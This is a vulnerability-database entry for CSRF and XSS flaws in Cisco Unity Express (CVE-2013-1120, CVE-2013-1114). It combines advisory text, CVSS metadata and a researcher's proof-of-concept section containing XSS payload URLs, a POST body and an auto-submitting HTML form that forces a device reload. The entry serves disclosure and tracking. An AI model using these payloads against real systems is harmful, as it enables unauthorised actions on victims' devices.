var-201302-0172
Vulnerability from variot
Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisco Unity Express with software before 8.0 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCue35910. Cisco Unity Express Contains a cross-site request forgery vulnerability. The problem is Bug ID CSCue35910 It is a problem.Authentication may be hijacked by a third party. Exploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. Cisco Unity is an advanced unified communications solution for enterprise-level organizations that can provide powerful messaging services and intelligent voice messaging services. Through an unknown vector, a remote attacker could exploit this vulnerability to hijack the authentication information of an unknown victim user. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities
Reported: December 2012
Disclosed: February 2013
Author: Jacob Holcomb of Independent Security Evaluators
CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html
Cisco Advisory http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
Proof of Concept XSS - CVE-2013-1114: GET: Reflective XSS & Info disclosure http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=>alert(42)
Information Disclosure Location: /Web/WEB-INF/screens/main.jsp Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp Internal Servlet Error:
javax.servlet.ServletException: invalid character at position 1 in > org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777)
Root cause: java.lang.NumberFormatException: invalid character at position 1 in > java.lang.Throwable. (Throwable.java:166) java.lang.Integer.parseInt (Integer.java:775) java.lang.Integer.parseInt (Integer.java:262) com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777)
POST: Persistent XSS http://X.X.X.X/Web/SA3/AddHoliday.do POST Data: holiday.description=>alert(42)&submitType=ADD
CSRF - CVE-2013-1120:
Reload Cisco Unity Express CSRF document.CUEreload.submit();. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Cisco Unity Express Cross-Site Scripting and Request Forgery Vulnerabilities
SECUNIA ADVISORY ID: SA52045
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
RELEASE DATE: 2013-02-04
DISCUSS ADVISORY: http://secunia.com/advisories/52045/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52045/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52045
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Some vulnerabilities have been reported in Cisco Unity Express, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks.
1) Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
2) The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to perform certain actions when a logged-in user visits a specially crafted web page.
The vulnerabilities are reported in versions prior to 8.0.
SOLUTION: Upgrade to version 8.0 or later (please contact the vendor for more information).
PROVIDED AND/OR DISCOVERED BY: The vendor credits Jacob Holcomb, Independent Security Evaluators
ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=28044 http://tools.cisco.com/security/center/viewAlert.x?alertId=28045 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201302-0172", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "7.2" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "2.1" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "2.0" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "7.3" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "7.1" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "1.1.1" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "2.2" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "7.0" }, { "model": "unity express software", "scope": "eq", "trust": 1.6, "vendor": "cisco", "version": "1.1.2" }, { "model": "unity express", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "*" }, { "model": "unity express software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0" }, { "model": "unity express software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.2" }, { "model": "unity express software", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "7.4" }, { "model": "unity express software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1" }, { "model": "unity express software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.3" }, { "model": "unity express", "scope": "lt", "trust": 0.8, "vendor": "cisco", "version": "software 8.0" }, { "model": "unity express software", "scope": "lt", "trust": 0.8, "vendor": "cisco", "version": "8.0" }, { "model": "unity express software", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "7.4" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "CNNVD", "id": "CNNVD-201302-081" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:cisco:unity_express", "vulnerable": true }, { "cpe22Uri": "cpe:/a:cisco:unity_express_software", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-001443" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jacob Holcomb of Independent Security Evaluators", "sources": [ { "db": "BID", "id": "57678" } ], "trust": 0.3 }, "cve": "CVE-2013-1120", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2013-1120", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-61122", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-1120", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2013-1120", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201302-081", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-61122", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61122" }, { "db": "JVNDB", "id": "JVNDB-2013-001443" }, { "db": "CNNVD", "id": "CNNVD-201302-081" }, { "db": "NVD", "id": "CVE-2013-1120" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple cross-site request forgery (CSRF) vulnerabilities on the Cisco Unity Express with software before 8.0 allow remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCue35910. Cisco Unity Express Contains a cross-site request forgery vulnerability. The problem is Bug ID CSCue35910 It is a problem.Authentication may be hijacked by a third party. \nExploiting these issues may allow a remote attacker to perform certain actions in the context of an authorized user\u0027s session and gain unauthorized access to the affected application; other attacks are also possible. Cisco Unity is an advanced unified communications solution for enterprise-level organizations that can provide powerful messaging services and intelligent voice messaging services. Through an unknown vector, a remote attacker could exploit this vulnerability to hijack the authentication information of an unknown victim user. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities\n# Reported: December 2012\n# Disclosed: February 2013\n# Author: Jacob Holcomb of Independent Security Evaluators\n# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120\n# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html\n \nCisco Advisory\nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114\nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120\n \nProof of Concept\nXSS - CVE-2013-1114:\nGET:\nReflective XSS \u0026 Info disclosure\nhttp://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=\u003e\u003cscript\u003ealert(42)\u003c/script\u003e\n \nInformation Disclosure\nLocation: /Web/WEB-INF/screens/main.jsp\nError Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp\nInternal Servlet Error:\n \njavax.servlet.ServletException: invalid character at position 1 in \u003e\norg.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)\nWEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)\norg.apache.jasper.runtime.HttpJspBase.service (Unknown Source)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)\norg.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)\njava.security.AccessController.doPrivileged (AccessController.java:273)\norg.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)\norg.apache.jasper.runtime.PageContextImpl.include (Unknown Source)\nWEB_0002dINF.screens.main._jspService (main.java:396)\norg.apache.jasper.runtime.HttpJspBase.service (Unknown Source)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)\norg.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)\njava.security.AccessController.doPrivileged (AccessController.java:273)\norg.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)\norg.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)\norg.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)\ncom.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)\norg.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.core.ContextManager.internalService (Unknown Source)\norg.apache.tomcat.core.ContextManager.service (Unknown Source)\norg.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)\norg.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)\norg.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)\njava.lang.Thread.run (Thread.java:777)\n \nRoot cause:\njava.lang.NumberFormatException: invalid character at position 1 in \u003e\njava.lang.Throwable. (Throwable.java:166)\njava.lang.Integer.parseInt (Integer.java:775)\njava.lang.Integer.parseInt (Integer.java:262)\ncom.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)\nWEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)\norg.apache.jasper.runtime.HttpJspBase.service (Unknown Source)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)\norg.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)\njava.security.AccessController.doPrivileged (AccessController.java:273)\norg.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)\norg.apache.jasper.runtime.PageContextImpl.include (Unknown Source)\nWEB_0002dINF.screens.main._jspService (main.java:396)\norg.apache.jasper.runtime.HttpJspBase.service (Unknown Source)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)\norg.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)\njava.security.AccessController.doPrivileged (AccessController.java:273)\norg.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)\norg.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)\norg.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)\norg.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)\ncom.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)\norg.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\njavax.servlet.http.HttpServlet.service (HttpServlet.java)\norg.apache.tomcat.facade.ServletHandler.doService (Unknown Source)\norg.apache.tomcat.core.Handler.invoke (Unknown Source)\norg.apache.tomcat.core.Handler.service (Unknown Source)\norg.apache.tomcat.facade.ServletHandler.service (Unknown Source)\norg.apache.tomcat.core.ContextManager.internalService (Unknown Source)\norg.apache.tomcat.core.ContextManager.service (Unknown Source)\norg.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)\norg.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)\norg.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)\njava.lang.Thread.run (Thread.java:777)\n \n \n \nPOST:\nPersistent XSS\nhttp://X.X.X.X/Web/SA3/AddHoliday.do\nPOST Data: holiday.description=\u003e\u003cscript\u003ealert(42)\u003c/script\u003e\u0026submitType=ADD\n \n \nCSRF - CVE-2013-1120:\n \n\u003chtml\u003e\n\u003c!-- # Exploit Title: Cisco Unity Express CSRF\n # Date: Discovered and reported December 2012\n # Disclosed: February 2013\n # Author: Jacob Holcomb of Independent Security Evaluators\n # Software: Cisco Unity Express\n # CVE : CVE-2013-1120 for the CSRF\n # Note: All the HTML forms are susceptible to forgery --\u003e\n \n\u003chead\u003e\n\u003ctitle\u003eReload Cisco Unity Express CSRF\u003c/title\u003e\n\u003c/head\u003e\n \n\u003cbody\u003e\n \n\u003cform name=\"CUEreload\" action=\"http://X.X.X.X/Web/SA/SaveConfiguration.do\" method=\"post\"\u003e\n\u003cinput type=\"hidden\" name=\"submitType\" value=\"RELOAD\"/\u003e\n\u003c/form\u003e\n \n\u003cscript\u003e\ndocument.CUEreload.submit();\n\u003c/script\u003e\n \n\u003c/body\u003e\n\u003c/html\u003e\n\n\n. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nCisco Unity Express Cross-Site Scripting and Request Forgery\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52045\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52045/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52045\n\nRELEASE DATE:\n2013-02-04\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52045/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52045/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52045\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Cisco Unity Express, which\ncan be exploited by malicious people to conduct cross-site scripting\nand request forgery attacks. \n\n1) Certain unspecified input is not properly sanitised before being\nreturned to the user. This can be exploited to execute arbitrary HTML\nand script code in a user\u0027s browser session in context of an affected\nsite. \n\n2) The application allows users to perform certain actions via HTTP\nrequests without performing proper validity checks to verify the\nrequests. This can be exploited to perform certain actions when a\nlogged-in user visits a specially crafted web page. \n\nThe vulnerabilities are reported in versions prior to 8.0. \n\nSOLUTION:\nUpgrade to version 8.0 or later (please contact the vendor for more\ninformation). \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits Jacob Holcomb, Independent Security Evaluators\n\nORIGINAL ADVISORY:\nCisco:\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=28044\nhttp://tools.cisco.com/security/center/viewAlert.x?alertId=28045\nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114\nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia 